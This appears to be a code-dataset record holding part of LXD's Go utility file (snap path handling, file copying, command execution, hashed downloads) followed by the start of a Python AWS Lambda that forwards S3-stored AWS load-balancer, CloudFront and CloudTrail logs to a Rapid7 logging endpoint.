return (stat.Mode() & os.ModeSocket) == os.ModeSocket
}
// HostPathFollow takes a valid path (from HostPath) and resolves it
// all the way to its target or to the last which can be resolved.
func HostPathFollow(path string) string {
// Ignore empty paths
if len(path) == 0 {
return path
}
// Don't prefix stdin/stdout
if path == "-" {
return path
}
// Check if we're running in a snap package.
if !InSnap() {
return path
}
// Handle relative paths
if path[0] != os.PathSeparator {
// Use the cwd of the parent as snap-confine alters our own cwd on launch
ppid := os.Getppid()
if ppid < 1 {
return path
}
pwd, err := os.Readlink(fmt.Sprintf("/proc/%d/cwd", ppid))
if err != nil {
return path
}
path = filepath.Clean(strings.Join([]string{pwd, path}, string(os.PathSeparator)))
}
// Rely on "readlink -m" to do the right thing.
path = HostPath(path)
for {
target, err := RunCommand("readlink", "-m", path)
if err != nil {
return path
}
target = strings.TrimSpace(target)
if path == HostPath(target) {
return path
}
path = HostPath(target)
}
}
// HostPath returns the host path for the provided path
// On a normal system, this does nothing
// When inside of a snap environment, returns the real path
func HostPath(path string) string {
// Ignore empty paths
if len(path) == 0 {
return path
}
// Don't prefix stdin/stdout
if path == "-" {
return path
}
// Check if we're running in a snap package
if !InSnap() {
return path
}
// Handle relative paths
if path[0] != os.PathSeparator {
// Use the cwd of the parent as snap-confine alters our own cwd on launch
ppid := os.Getppid()
if ppid < 1 {
return path
}
pwd, err := os.Readlink(fmt.Sprintf("/proc/%d/cwd", ppid))
if err != nil {
return path
}
path = filepath.Clean(strings.Join([]string{pwd, path}, string(os.PathSeparator)))
}
// Check if the path is already snap-aware
for _, prefix := range []string{"/dev", "/snap", "/var/snap", "/var/lib/snapd"} {
if path == prefix || strings.HasPrefix(path, fmt.Sprintf("%s/", prefix)) {
return path
}
}
return fmt.Sprintf("/var/lib/snapd/hostfs%s", path)
}
// VarPath returns the provided path elements joined by a slash and
// appended to the end of $LXD_DIR, which defaults to /var/lib/lxd.
func VarPath(path ...string) string {
varDir := os.Getenv("LXD_DIR")
if varDir == "" {
varDir = "/var/lib/lxd"
}
items := []string{varDir}
items = append(items, path...)
return filepath.Join(items...)
}
// CachePath returns the directory that LXD should its cache under. If LXD_DIR is
// set, this path is $LXD_DIR/cache, otherwise it is /var/cache/lxd.
func CachePath(path ...string) string {
varDir := os.Getenv("LXD_DIR")
logDir := "/var/cache/lxd"
if varDir != "" {
logDir = filepath.Join(varDir, "cache")
}
items := []string{logDir}
items = append(items, path...)
return filepath.Join(items...)
}
// LogPath returns the directory that LXD should put logs under. If LXD_DIR is
// set, this path is $LXD_DIR/logs, otherwise it is /var/log/lxd.
func LogPath(path ...string) string {
varDir := os.Getenv("LXD_DIR")
logDir := "/var/log/lxd"
if varDir != "" {
logDir = filepath.Join(varDir, "logs")
}
items := []string{logDir}
items = append(items, path...)
return filepath.Join(items...)
}
func ParseLXDFileHeaders(headers http.Header) (uid int64, gid int64, mode int, type_ string, write string) {
uid, err := strconv.ParseInt(headers.Get("X-LXD-uid"), 10, 64)
if err != nil {
uid = -1
}
gid, err = strconv.ParseInt(headers.Get("X-LXD-gid"), 10, 64)
if err != nil {
gid = -1
}
mode, err = strconv.Atoi(headers.Get("X-LXD-mode"))
if err != nil {
mode = -1
} else {
rawMode, err := strconv.ParseInt(headers.Get("X-LXD-mode"), 0, 0)
if err == nil {
mode = int(os.FileMode(rawMode) & os.ModePerm)
}
}
type_ = headers.Get("X-LXD-type")
/* backwards compat: before "type" was introduced, we could only
* manipulate files
*/
if type_ == "" {
type_ = "file"
}
write = headers.Get("X-LXD-write")
/* backwards compat: before "write" was introduced, we could only
* overwrite files
*/
if write == "" {
write = "overwrite"
}
return uid, gid, mode, type_, write
}
func ReaderToChannel(r io.Reader, bufferSize int) <-chan []byte {
if bufferSize <= 128*1024 {
bufferSize = 128 * 1024
}
ch := make(chan ([]byte))
go func() {
readSize := 128 * 1024
offset := 0
buf := make([]byte, bufferSize)
for {
read := buf[offset : offset+readSize]
nr, err := r.Read(read)
offset += nr
if offset > 0 && (offset+readSize >= bufferSize || err != nil) {
ch <- buf[0:offset]
offset = 0
buf = make([]byte, bufferSize)
}
if err != nil {
close(ch)
break
}
}
}()
return ch
}
// Returns a random base64 encoded string from crypto/rand.
func RandomCryptoString() (string, error) {
buf := make([]byte, 32)
n, err := rand.Read(buf)
if err != nil {
return "", err
}
if n != len(buf) {
return "", fmt.Errorf("not enough random bytes read")
}
return hex.EncodeToString(buf), nil
}
func AtoiEmptyDefault(s string, def int) (int, error) {
if s == "" {
return def, nil
}
return strconv.Atoi(s)
}
func ReadStdin() ([]byte, error) {
buf := bufio.NewReader(os.Stdin)
line, _, err := buf.ReadLine()
if err != nil {
return nil, err
}
return line, nil
}
func WriteAll(w io.Writer, data []byte) error {
buf := bytes.NewBuffer(data)
toWrite := int64(buf.Len())
for {
n, err := io.Copy(w, buf)
if err != nil {
return err
}
toWrite -= n
if toWrite <= 0 {
return nil
}
}
}
// QuotaWriter returns an error once a given write quota gets exceeded.
type QuotaWriter struct {
writer io.Writer
quota int64
n int64
}
// NewQuotaWriter returns a new QuotaWriter wrapping the given writer.
//
// If the given quota is negative, then no quota is applied.
func NewQuotaWriter(writer io.Writer, quota int64) *QuotaWriter {
return &QuotaWriter{
writer: writer,
quota: quota,
}
}
// Write implements the Writer interface.
func (w *QuotaWriter) Write(p []byte) (n int, err error) {
if w.quota >= 0 {
w.n += int64(len(p))
if w.n > w.quota {
return 0, fmt.Errorf("reached %d bytes, exceeding quota of %d", w.n, w.quota)
}
}
return w.writer.Write(p)
}
// FileMove tries to move a file by using os.Rename,
// if that fails it tries to copy the file and remove the source.
func FileMove(oldPath string, newPath string) error {
err := os.Rename(oldPath, newPath)
if err == nil {
return nil
}
err = FileCopy(oldPath, newPath)
if err != nil {
return err
}
os.Remove(oldPath)
return nil
}
// FileCopy copies a file, overwriting the target if it exists.
func FileCopy(source string, dest string) error {
fi, err := os.Lstat(source)
if err != nil {
return err
}
_, uid, gid := GetOwnerMode(fi)
if fi.Mode()&os.ModeSymlink != 0 {
target, err := os.Readlink(source)
if err != nil {
return err
}
if PathExists(dest) {
err = os.Remove(dest)
if err != nil {
return err
}
}
err = os.Symlink(target, dest)
if err != nil {
return err
}
if runtime.GOOS != "windows" {
return os.Lchown(dest, uid, gid)
}
return nil
}
s, err := os.Open(source)
if err != nil {
return err
}
defer s.Close()
d, err := os.Create(dest)
if err != nil {
if os.IsExist(err) {
d, err = os.OpenFile(dest, os.O_WRONLY, fi.Mode())
if err != nil {
return err
}
} else {
return err
}
}
defer d.Close()
_, err = io.Copy(d, s)
if err != nil {
return err
}
/* chown not supported on windows */
if runtime.GOOS != "windows" {
return d.Chown(uid, gid)
}
return nil
}
// DirCopy copies a directory recursively, overwriting the target if it exists.
func DirCopy(source string, dest string) error {
// Get info about source.
info, err := os.Stat(source)
if err != nil {
return errors.Wrapf(err, "failed to get source directory info")
}
if !info.IsDir() {
return fmt.Errorf("source is not a directory")
}
// Remove dest if it already exists.
if PathExists(dest) {
err := os.RemoveAll(dest)
if err != nil {
return errors.Wrapf(err, "failed to remove destination directory %s", dest)
}
}
// Create dest.
err = os.MkdirAll(dest, info.Mode())
if err != nil {
return errors.Wrapf(err, "failed to create destination directory %s", dest)
}
// Copy all files.
entries, err := ioutil.ReadDir(source)
if err != nil {
return errors.Wrapf(err, "failed to read source directory %s", source)
}
for _, entry := range entries {
sourcePath := filepath.Join(source, entry.Name())
destPath := filepath.Join(dest, entry.Name())
if entry.IsDir() {
err := DirCopy(sourcePath, destPath)
if err != nil {
return errors.Wrapf(err, "failed to copy sub-directory from %s to %s", sourcePath, destPath)
}
} else {
err := FileCopy(sourcePath, destPath)
if err != nil {
return errors.Wrapf(err, "failed to copy file from %s to %s", sourcePath, destPath)
}
}
}
return nil
}
type BytesReadCloser struct {
Buf *bytes.Buffer
}
func (r BytesReadCloser) Read(b []byte) (n int, err error) {
return r.Buf.Read(b)
}
func (r BytesReadCloser) Close() error {
/* no-op since we're in memory */
return nil
}
func IsSnapshot(name string) bool {
return strings.Contains(name, SnapshotDelimiter)
}
func MkdirAllOwner(path string, perm os.FileMode, uid int, gid int) error {
// This function is a slightly modified version of MkdirAll from the Go standard library.
// https://golang.org/src/os/path.go?s=488:535#L9
// Fast path: if we can tell whether path is a directory or file, stop with success or error.
dir, err := os.Stat(path)
if err == nil {
if dir.IsDir() {
return nil
}
return fmt.Errorf("path exists but isn't a directory")
}
// Slow path: make sure parent exists and then call Mkdir for path.
i := len(path)
for i > 0 && os.IsPathSeparator(path[i-1]) { // Skip trailing path separator.
i--
}
j := i
for j > 0 && !os.IsPathSeparator(path[j-1]) { // Scan backward over element.
j--
}
if j > 1 {
// Create parent
err = MkdirAllOwner(path[0:j-1], perm, uid, gid)
if err != nil {
return err
}
}
// Parent now exists; invoke Mkdir and use its result.
err = os.Mkdir(path, perm)
err_chown := os.Chown(path, uid, gid)
if err_chown != nil {
return err_chown
}
if err != nil {
// Handle arguments like "foo/." by
// double-checking that directory doesn't exist.
dir, err1 := os.Lstat(path)
if err1 == nil && dir.IsDir() {
return nil
}
return err
}
return nil
}
func StringInSlice(key string, list []string) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
// StringHasPrefix returns true if value has one of the supplied prefixes.
func StringHasPrefix(value string, prefixes ...string) bool {
for _, prefix := range prefixes {
if strings.HasPrefix(value, prefix) {
return true
}
}
return false
}
func IntInSlice(key int, list []int) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
func Int64InSlice(key int64, list []int64) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
func Uint64InSlice(key uint64, list []uint64) bool {
for _, entry := range list {
if entry == key {
return true
}
}
return false
}
func IsTrue(value string) bool {
return StringInSlice(strings.ToLower(value), []string{"true", "1", "yes", "on"})
}
func IsFalse(value string) bool {
return StringInSlice(strings.ToLower(value), []string{"false", "0", "no", "off"})
}
func IsUserConfig(key string) bool {
return strings.HasPrefix(key, "user.")
}
// StringMapHasStringKey returns true if any of the supplied keys are present in the map.
func StringMapHasStringKey(m map[string]string, keys ...string) bool {
for _, k := range keys {
if _, ok := m[k]; ok {
return true
}
}
return false
}
func IsBlockdev(fm os.FileMode) bool {
return ((fm&os.ModeDevice != 0) && (fm&os.ModeCharDevice == 0))
}
func IsBlockdevPath(pathName string) bool {
sb, err := os.Stat(pathName)
if err != nil {
return false
}
fm := sb.Mode()
return ((fm&os.ModeDevice != 0) && (fm&os.ModeCharDevice == 0))
}
// DeepCopy copies src to dest by using encoding/gob so its not that fast.
func DeepCopy(src, dest interface{}) error {
buff := new(bytes.Buffer)
enc := gob.NewEncoder(buff)
dec := gob.NewDecoder(buff)
if err := enc.Encode(src); err != nil {
return err
}
if err := dec.Decode(dest); err != nil {
return err
}
return nil
}
func RunningInUserNS() bool {
file, err := os.Open("/proc/self/uid_map")
if err != nil {
return false
}
defer file.Close()
buf := bufio.NewReader(file)
l, _, err := buf.ReadLine()
if err != nil {
return false
}
line := string(l)
var a, b, c int64
fmt.Sscanf(line, "%d %d %d", &a, &b, &c)
if a == 0 && b == 0 && c == 4294967295 {
return false
}
return true
}
// ValidHostname checks the string is valid DNS hostname.
func ValidHostname(name string) error {
// Validate length
if len(name) < 1 || len(name) > 63 {
return fmt.Errorf("Name must be 1-63 characters long")
}
// Validate first character
if strings.HasPrefix(name, "-") {
return fmt.Errorf(`Name must not start with "-" character`)
}
if _, err := strconv.Atoi(string(name[0])); err == nil {
return fmt.Errorf("Name must not be a number")
}
// Validate last character
if strings.HasSuffix(name, "-") {
return fmt.Errorf(`Name must not end with "-" character`)
}
// Validate the character set
match, _ := regexp.MatchString("^[-a-zA-Z0-9]*$", name)
if !match {
return fmt.Errorf("Name can only contain alphanumeric and hyphen characters")
}
return nil
}
// Spawn the editor with a temporary YAML file for editing configs
func TextEditor(inPath string, inContent []byte) ([]byte, error) {
var f *os.File
var err error
var path string
// Detect the text editor to use
editor := os.Getenv("VISUAL")
if editor == "" {
editor = os.Getenv("EDITOR")
if editor == "" {
for _, p := range []string{"editor", "vi", "emacs", "nano"} {
_, err := exec.LookPath(p)
if err == nil {
editor = p
break
}
}
if editor == "" {
return []byte{}, fmt.Errorf("No text editor found, please set the EDITOR environment variable")
}
}
}
if inPath == "" {
// If provided input, create a new file
f, err = ioutil.TempFile("", "lxd_editor_")
if err != nil {
return []byte{}, err
}
err = os.Chmod(f.Name(), 0600)
if err != nil {
f.Close()
os.Remove(f.Name())
return []byte{}, err
}
f.Write(inContent)
f.Close()
path = fmt.Sprintf("%s.yaml", f.Name())
os.Rename(f.Name(), path)
defer os.Remove(path)
} else {
path = inPath
}
cmdParts := strings.Fields(editor)
cmd := exec.Command(cmdParts[0], append(cmdParts[1:], path)...)
cmd.Stdin = os.Stdin
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
err = cmd.Run()
if err != nil {
return []byte{}, err
}
content, err := ioutil.ReadFile(path)
if err != nil {
return []byte{}, err
}
return content, nil
}
func ParseMetadata(metadata interface{}) (map[string]interface{}, error) {
newMetadata := make(map[string]interface{})
s := reflect.ValueOf(metadata)
if !s.IsValid() {
return nil, nil
}
if s.Kind() == reflect.Map {
for _, k := range s.MapKeys() {
if k.Kind() != reflect.String {
return nil, fmt.Errorf("Invalid metadata provided (key isn't a string)")
}
newMetadata[k.String()] = s.MapIndex(k).Interface()
}
} else if s.Kind() == reflect.Ptr && !s.Elem().IsValid() {
return nil, nil
} else {
return nil, fmt.Errorf("Invalid metadata provided (type isn't a map)")
}
return newMetadata, nil
}
// RemoveDuplicatesFromString removes all duplicates of the string 'sep'
// from the specified string 's'. Leading and trailing occurrences of sep
// are NOT removed (duplicate leading/trailing are). Performs poorly if
// there are multiple consecutive redundant separators.
func RemoveDuplicatesFromString(s string, sep string) string {
dup := sep + sep
for s = strings.Replace(s, dup, sep, -1); strings.Contains(s, dup); s = strings.Replace(s, dup, sep, -1) {
}
return s
}
type RunError struct {
msg string
Err error
Stdout string
Stderr string
}
func (e RunError) Error() string {
return e.msg
}
// RunCommandSplit runs a command with a supplied environment and optional arguments and returns the
// resulting stdout and stderr output as separate variables. If the supplied environment is nil then
// the default environment is used. If the command fails to start or returns a non-zero exit code
// then an error is returned containing the output of stderr too.
func RunCommandSplit(env []string, filesInherit []*os.File, name string, arg ...string) (string, string, error) {
cmd := exec.Command(name, arg...)
if env != nil {
cmd.Env = env
}
if filesInherit != nil {
cmd.ExtraFiles = filesInherit
}
var stdout bytes.Buffer
var stderr bytes.Buffer
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
if err != nil {
err := RunError{
msg: fmt.Sprintf("Failed to run: %s %s: %s", name, strings.Join(arg, " "), strings.TrimSpace(stderr.String())),
Stdout: stdout.String(),
Stderr: stderr.String(),
Err: err,
}
return stdout.String(), stderr.String(), err
}
return stdout.String(), stderr.String(), nil
}
// RunCommand runs a command with optional arguments and returns stdout. If the command fails to
// start or returns a non-zero exit code then an error is returned containing the output of stderr.
func RunCommand(name string, arg ...string) (string, error) {
stdout, _, err := RunCommandSplit(nil, nil, name, arg...)
return stdout, err
}
// RunCommandInheritFds runs a command with optional arguments and passes a set
// of file descriptors to the newly created process, returning stdout. If the
// command fails to start or returns a non-zero exit code then an error is
// returned containing the output of stderr.
func RunCommandInheritFds(filesInherit []*os.File, name string, arg ...string) (string, error) {
stdout, _, err := RunCommandSplit(nil, filesInherit, name, arg...)
return stdout, err
}
// RunCommandCLocale runs a command with a LANG=C.UTF-8 environment set with optional arguments and
// returns stdout. If the command fails to start or returns a non-zero exit code then an error is
// returned containing the output of stderr.
func RunCommandCLocale(name string, arg ...string) (string, error) {
stdout, _, err := RunCommandSplit(append(os.Environ(), "LANG=C.UTF-8"), nil, name, arg...)
return stdout, err
}
func RunCommandWithFds(stdin io.Reader, stdout io.Writer, name string, arg ...string) error {
cmd := exec.Command(name, arg...)
if stdin != nil {
cmd.Stdin = stdin
}
if stdout != nil {
cmd.Stdout = stdout
}
var buffer bytes.Buffer
cmd.Stderr = &buffer
err := cmd.Run()
if err != nil {
err := RunError{
msg: fmt.Sprintf("Failed to run: %s %s: %s", name, strings.Join(arg, " "),
strings.TrimSpace(buffer.String())),
Err: err,
Stderr: buffer.String(),
}
return err
}
return nil
}
// TryRunCommand runs the specified command up to 20 times with a 500ms delay between each call
// until it runs without an error. If after 20 times it is still failing then returns the error.
func TryRunCommand(name string, arg ...string) (string, error) {
var err error
var output string
for i := 0; i < 20; i++ {
output, err = RunCommand(name, arg...)
if err == nil {
break
}
time.Sleep(500 * time.Millisecond)
}
return output, err
}
func TimeIsSet(ts time.Time) bool {
if ts.Unix() <= 0 {
return false
}
if ts.UTC().Unix() <= 0 {
return false
}
return true
}
// EscapePathFstab escapes a path fstab-style.
// This ensures that getmntent_r() and friends can correctly parse stuff like
// /some/wacky path with spaces /some/wacky target with spaces
func EscapePathFstab(path string) string {
r := strings.NewReplacer(
" ", "\\040",
"\t", "\\011",
"\n", "\\012",
"\\", "\\\\")
return r.Replace(path)
}
func SetProgressMetadata(metadata map[string]interface{}, stage, displayPrefix string, percent, processed, speed int64) {
progress := make(map[string]string)
// stage, percent, speed sent for API callers.
progress["stage"] = stage
if processed > 0 {
progress["processed"] = strconv.FormatInt(processed, 10)
}
if percent > 0 {
progress["percent"] = strconv.FormatInt(percent, 10)
}
progress["speed"] = strconv.FormatInt(speed, 10)
metadata["progress"] = progress
// <stage>_progress with formatted text sent for lxc cli.
if percent > 0 {
metadata[stage+"_progress"] = fmt.Sprintf("%s: %d%% (%s/s)", displayPrefix, percent, units.GetByteSizeString(speed, 2))
} else if processed > 0 {
metadata[stage+"_progress"] = fmt.Sprintf("%s: %s (%s/s)", displayPrefix, units.GetByteSizeString(processed, 2), units.GetByteSizeString(speed, 2))
} else {
metadata[stage+"_progress"] = fmt.Sprintf("%s: %s/s", displayPrefix, units.GetByteSizeString(speed, 2))
}
}
func DownloadFileHash(ctx context.Context, httpClient *http.Client, useragent string, progress func(progress ioprogress.ProgressData), canceler *cancel.Canceler, filename string, url string, hash string, hashFunc hash.Hash, target io.WriteSeeker) (int64, error) {
// Always seek to the beginning
target.Seek(0, 0)
var req *http.Request
var err error
// Prepare the download request
if ctx != nil {
req, err = http.NewRequestWithContext(ctx, "GET", url, nil)
} else {
req, err = http.NewRequest("GET", url, nil)
}
if err != nil {
return -1, err
}
if useragent != "" {
req.Header.Set("User-Agent", useragent)
}
// Perform the request
r, doneCh, err := cancel.CancelableDownload(canceler, httpClient, req)
if err != nil {
return -1, err
}
defer r.Body.Close()
defer close(doneCh)
if r.StatusCode != http.StatusOK {
return -1, fmt.Errorf("Unable to fetch %s: %s", url, r.Status)
}
// Handle the data
body := r.Body
if progress != nil {
body = &ioprogress.ProgressReader{
ReadCloser: r.Body,
Tracker: &ioprogress.ProgressTracker{
Length: r.ContentLength,
Handler: func(percent int64, speed int64) {
if filename != "" {
progress(ioprogress.ProgressData{Text: fmt.Sprintf("%s: %d%% (%s/s)", filename, percent, units.GetByteSizeString(speed, 2))})
} else {
progress(ioprogress.ProgressData{Text: fmt.Sprintf("%d%% (%s/s)", percent, units.GetByteSizeString(speed, 2))})
}
},
},
}
}
var size int64
if hashFunc != nil {
size, err = io.Copy(io.MultiWriter(target, hashFunc), body)
if err != nil {
return -1, err
}
result := fmt.Sprintf("%x", hashFunc.Sum(nil))
if result != hash {
return -1, fmt.Errorf("Hash mismatch for %s: %s != %s", url, result, hash)
}
} else {
size, err = io.Copy(target, body)
if err != nil {
return -1, err
}
}
return size, nil
}
func ParseNumberFromFile(file string) (int64, error) {
f, err := os.Open(file)
if err != nil {
return int64(0), err
}
defer f.Close()
buf := make([]byte, 4096)
n, err := f.Read(buf)
if err != nil {
return int64(0), err
}
str := strings.TrimSpace(string(buf[0:n]))
nr, err := strconv.Atoi(str)
if err != nil {
return int64(0), err
}
return int64(nr), nil
}
type ReadSeeker struct {
io.Reader
io.Seeker
}
func NewReadSeeker(reader io.Reader, seeker io.Seeker) *ReadSeeker {
return &ReadSeeker{Reader: reader, Seeker: seeker}
}
func (r *ReadSeeker) Read(p []byte) (n int, err error) {
return r.Reader.Read(p)
}
func (r *ReadSeeker) Seek(offset int64, whence int) (int64, error) {
return r.Seeker.Seek(offset, whence)
}
// RenderTemplate renders a pongo2 template.
func RenderTemplate(template string, ctx pongo2.Context) (string, error) {
// Load template from string
tpl, err := pongo2.FromString("{% autoescape off %}" + template + "{% endautoescape %}")
if err != nil {
return "", err
}
// Get rendered template
ret, err := tpl.Execute(ctx)
if err != nil {
return ret, err
}
// Looks like we're nesting templates so run pongo again
if strings.Contains(ret, "{{") || strings.Contains(ret, "{%") {
return RenderTemplate(ret, ctx)
}
return ret, err
}
func GetSnapshotExpiry(refDate time.Time, s string) (time.Time, error) {
expr := strings.TrimSpace(s)
if expr == "" {
return time.Time{}, nil
}
re := regexp.MustCompile(`^(\d+)(M|H|d|w|m|y)$`)
expiry := map[string]int{
"M": 0,
"H": 0,
"d": 0,
"w": 0,
"m": 0,
"y": 0,
}
values := strings.Split(expr, " ")
if len(values) == 0 {
return time.Time{}, nil
}
for _, value := range values {
fields := re.FindStringSubmatch(value)
if fields == nil {
return time.Time{}, fmt.Errorf("Invalid expiry expression")
}
if expiry[fields[2]] > 0 {
// We don't allow fields to be set multiple times
return time.Time{}, fmt.Errorf("Invalid expiry expression")
}
val, err := strconv.Atoi(fields[1])
if err != nil {
return time.Time{}, err
}
expiry[fields[2]] = val
}
t := refDate.AddDate(expiry["y"], expiry["m"], expiry["d"]+expiry["w"]*7).Add(
time.Hour*time.Duration(expiry["H"]) + time.Minute*time.Duration(expiry["M"]))
return t, nil
}
// InSnap returns true if we're running inside the LXD snap.
func InSnap() bool {
// Detect the snap.
_, snapPath := os.LookupEnv("SNAP")
snapName := os.Getenv("SNAP_NAME")
if snapPath && snapName == "lxd" {
return true
}
return false
}
// JoinUrlPath return the join of the input urls/paths sanitized.
func JoinUrls(baseUrl, p string) (string, error) {
u, err := url.Parse(baseUrl)
if err != nil {
return "", err
}
u.Path = path.Join(u.Path, p)
return u.String(), nil
}
| [
"\"LXD_DIR\"",
"\"LXD_DIR\"",
"\"LXD_DIR\"",
"\"VISUAL\"",
"\"EDITOR\"",
"\"SNAP_NAME\""
] | [] | [
"VISUAL",
"EDITOR",
"SNAP_NAME",
"LXD_DIR"
] | [] | ["VISUAL", "EDITOR", "SNAP_NAME", "LXD_DIR"] | go | 4 | 0 | |
le_lambda.py | import gzip
import logging
import tempfile
import boto3
import socket
import ssl
import re
import urllib
import csv
import zlib
import json
import certifi
import os
import hashlib
from collections import OrderedDict
from uuid import UUID
logger = logging.getLogger()
logger.setLevel(logging.INFO)
logger.info('Loading function...')
s3 = boto3.client('s3')
REGION = os.environ.get('region')
ENDPOINT = '{}.data.logs.insight.rapid7.com'.format(REGION)
PORT = 20000
TOKEN = os.environ.get('token')
SALT = os.environ.get('salt')
def lambda_handler(event, context):
sock = create_socket()
if not validate_uuid(TOKEN):
logger.critical('{} is not a valid token. Exiting.'.format(TOKEN))
raise SystemExit
else:
# Get the object from the event and show its content type
bucket = event['Records'][0]['s3']['bucket']['name']
key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')
try:
response = s3.get_object(Bucket=bucket, Key=key)
logger.info('Fetched file {} from S3 bucket {}'.format(key, bucket))
body = response['Body']
data = body.read()
# If the name has a .gz extension, then decompress the data
if key[-3:] == '.gz':
with tempfile.TemporaryFile() as temporary_file:
temporary_file.write(data)
temporary_file.seek(0)
with gzip.GzipFile(fileobj=temporary_file, mode="r") as gz:
data = gz.read()
lines = data.split("\n")
logger.info('Total number of lines: {}'.format(len(list(lines))))
if validate_elb_log(str(key)) is True:
# timestamp elb client:port backend:port request_processing_time backend_processing_time
# response_processing_time elb_status_code backend_status_code received_bytes sent_bytes
# "request" "user_agent" ssl_cipher ssl_protocol
logger.info('File={} is AWS ELB log format. Parsing and sending to R7'.format(key))
rows = csv.reader(data.splitlines(), delimiter=' ', quotechar='"')
for line in rows:
request = line[11].split(' ')
idx = request[1].find('/', 9)
url = request[1][idx:]
parsed = OrderedDict()
parsed['timestamp'] = line[0]
parsed['elb_name'] = line[1]
parsed['client_ip'] = hashlib.sha256((line[2].split(':')[0] + SALT).encode()).hexdigest()
parsed['backend_ip'] = line[3].split(':')[0]
parsed['request_processing_time'] = line[4]
parsed['backend_processing_time'] = line[5]
parsed['response_processing_time'] = line[6]
parsed['elb_status_code'] = line[7]
parsed['backend_status_code'] = line[8]
parsed['received_bytes'] = line[9]
parsed['sent_bytes'] = line[10]
parsed['method'] = request[0]
parsed['url'] = url
parsed['user_agent'] = line[12]
parsed['ssl_cipher'] = line[13]
parsed['ssl_protocol'] = line[14]
mask = [
'elb_name',
'ssl_cipher'
]
msg = ' '.join([
'"{}"'.format(str(value)) for value in mask_parsed(parsed, mask).values()
])
sock.sendall('{} {}\n'.format(TOKEN, msg))
logger.info('Finished sending file={} to R7'.format(key))
elif validate_alb_log(str(key)) is True:
logger.info('File={} is AWS ALB log format. Parsing and sending to R7'.format(key))
rows = csv.reader(data.splitlines(), delimiter=' ', quotechar='"')
total_run_count = 0
good_run_count = 0
bad_run_count = 0
for line in rows:
total_run_count += 1
try:
request = line[12].split(' ')
url = request[1]
try:
http_version = request[2].split('/')[-1:][0]
except:
http_version = request[2]
parsed = OrderedDict()
parsed['type'] = line[0]
parsed['timestamp'] = line[1]
parsed['elb_id'] = line[2]
parsed['client_ip'] = hashlib.sha256((line[3].split(':')[0] + SALT).encode()).hexdigest()
parsed['client_port'] = line[3].split(':')[1]
parsed['target_ip'] = line[4].split(':')[0]
parsed['target_port'] = line[4].split(':')[1]
parsed['request_processing_time'] = line[5]
parsed['target_processing_time'] = line[6]
parsed['response_processing_time'] = line[7]
parsed['elb_status_code'] = line[8]
parsed['target_status_code'] = line[9]
parsed['received_bytes'] = line[10]
parsed['sent_bytes'] = line[11]
parsed['method'] = request[0]
parsed['url'] = url
parsed['http_version'] = http_version
parsed['user_agent'] = line[13]
parsed['ssl_cipher'] = line[14]
parsed['ssl_protocol'] = line[15]
parsed['target_group_arn'] = line[16]
parsed['trace_id'] = line[17]
mask = [
'elb_id',
'ssl_cipher',
'target_group_arn',
'trace_id'
]
msg = ' '.join([
'"{}"'.format(str(value)) for value in mask_parsed(parsed, mask).values()
])
sock.sendall('{} {}\n'.format(TOKEN, msg))
good_run_count += 1
except IndexError:
bad_run_count += 1
logger.info('[ALB logs] bad log line: {}'.format(line))
pass
logger.info('[ALB logs] total run count: {}'.format(total_run_count))
logger.info('[ALB logs] processed-and-sent run count: {}'.format(good_run_count))
logger.info('[ALB logs] bad run count: {}'.format(bad_run_count))
logger.info('Finished sending file={} to R7'.format(key))
elif validate_cf_log(str(key)) is True:
# date time x-edge-location sc-bytes c-ip cs-method cs(Host)
# cs-uri-stem sc-status cs(Referer) cs(User-Agent) cs-uri-query
# cs(Cookie) x-edge-result-type x-edge-request-id x-host-header
# cs-protocol cs-bytes time-taken x-forwarded-for ssl-protocol
# ssl-cipher x-edge-response-result-type
logger.info('File={} is AWS CloudFront log format. Parsing and sending to R7'.format(key))
rows = csv.reader(data.splitlines(), delimiter='\t', quotechar='"')
for line in rows:
# Skip headers and lines with insufficient values
if len(line) < 23:
continue
msg = "\"{0}T{1}Z\" x_edge_location=\"{2}\"" \
" sc_bytes=\"{3}\" c_ip=\"{4}\" cs_method=\"{5}\"" \
" cs_host=\"{6}\" cs_uri_stem=\"{7}\" sc_status=\"{8}\"" \
" cs_referer=\"{9}\" cs_user_agent=\"{10}\" cs_uri_query=\"{11}\"" \
" cs_cookie=\"{12}\" x_edge_result_type=\"{13}\"" \
" x_edge_request_id=\"{14}\" x_host_header=\"{15}\"" \
" cs_protocol=\"{16}\" cs_bytes=\"{17}\" time_taken=\"{18}\"" \
" x_forwarded_for=\"{19}\" ssl_protocol=\"{20}\"" \
" ssl_cipher=\"{21}\" x_edge_response_result_type=\"{22}\"\n" \
.format(*line)
sock.sendall('{} {}\n'.format(TOKEN, msg))
logger.info('Finished sending file={} to R7'.format(key))
elif validate_ct_log(str(key)) is True:
logger.info('File={} is AWS CloudTrail log format. Parsing and sending to R7'.format(key))
cloud_trail = json.loads(data)
for event in cloud_trail['Records']:
sock.sendall('{} {}\n'.format(TOKEN, json.dumps(event)))
logger.info('Finished sending file={} to R7'.format(key))
else:
logger.info('File={} is unrecognized log format. Sending raw lines to R7'.format(key))
for line in lines:
sock.sendall('{} {}\n'.format(TOKEN, line))
logger.info('Finished sending file={} to R7'.format(key))
except Exception as e:
logger.error('Exception: {}'.format(e))
finally:
sock.close()
logger.info('Function execution finished.')
def create_socket():
logger.info('Creating SSL socket')
s_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = ssl.wrap_socket(
sock=s_,
keyfile=None,
certfile=None,
server_side=False,
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=getattr(
ssl,
'PROTOCOL_TLSv1_2',
ssl.PROTOCOL_TLSv1
),
ca_certs=certifi.where(),
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
)
try:
logger.info('Connecting to {}:{}'.format(ENDPOINT, PORT))
s.connect((ENDPOINT, PORT))
return s
except socket.error, exc:
logger.error('Exception socket.error : {}'.format(exc))
raise SystemExit
def validate_uuid(uuid_string):
try:
val = UUID(uuid_string)
except Exception as uuid_exc:
logger.error('Can not validate token: {}'.format(uuid_exc))
return False
return True
def validate_elb_log(key):
regex = re.compile('\d+_\w+_\w{2}-\w{4,9}-[12]_.*._\d{8}T\d{4}Z_\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}_.*.log$', re.I)
match = regex.search(key)
return bool(match)
